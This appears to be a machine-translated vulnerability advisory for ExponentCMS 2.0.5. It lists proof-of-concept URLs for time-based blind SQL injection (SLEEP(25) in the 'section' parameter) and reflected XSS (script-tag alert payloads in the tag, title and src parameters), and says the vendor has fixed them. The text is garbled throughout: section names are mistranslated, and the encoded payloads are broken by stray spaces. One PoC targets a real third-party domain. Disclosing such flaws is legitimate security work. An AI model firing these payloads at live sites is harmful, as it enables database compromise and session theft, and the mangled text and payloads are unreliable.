ExponentCMS 2.0.5 multiple defects and repair

Information
--------------------
Name: XSS and Blind SQL Injection Vulnerabilities in ExponentCMS
Image software: ExponentCMS 2.0.5 and possibly below.
Website: http://www.exponentcms.org
Defect type: Cross-Site Scripting and SQL Injection
Security level: Critical
Researcher: Onur Y ı lmaz
Description
--------------------
Exponent is a website content management system (or CMS) that allows
Site owners to easily create and manage dynamic websites
Necessarily directly coding web pages, or managing site navigation.
 
Diary
--------------------
Exponent CMS 2.0.5 has xss Defects
 
Example PoC urls are as follows:
A http://www.bkjia.com/index. php? Section = (SELECT % 201% 20 FROM % 20 (SELECT % 20 SLEEP (25))
Http://example.com/index.php? Action = showall_by_tags & tag = % 27% 22 -- % 3E % 3C/style % 3E % 3C/script % 3E % 3 Cscript % 3 Ealert (1337) % 3C/script % 3E & controller = news & src =
() Random4e5433b85bb1f
Http://example.com/index.php? Controller = expTag & action = show & title = changes & src = % 27% 22 -- % 3E % 3C/style % 3E % 3C/script % 3E % 3 Cscript % 3 Ealert (1337) % 3C/script % 3E
 
You can read the full article about Cross-Site Scripting and SQL
Injection vulnerabilities from here:
Http://www.mavitunasecurity.com/crosssite-scripting-xss/
Http://www.mavitunasecurity.com/sql-injection/
 
Solution
--------------------
The developer has fixed these problems in the new version.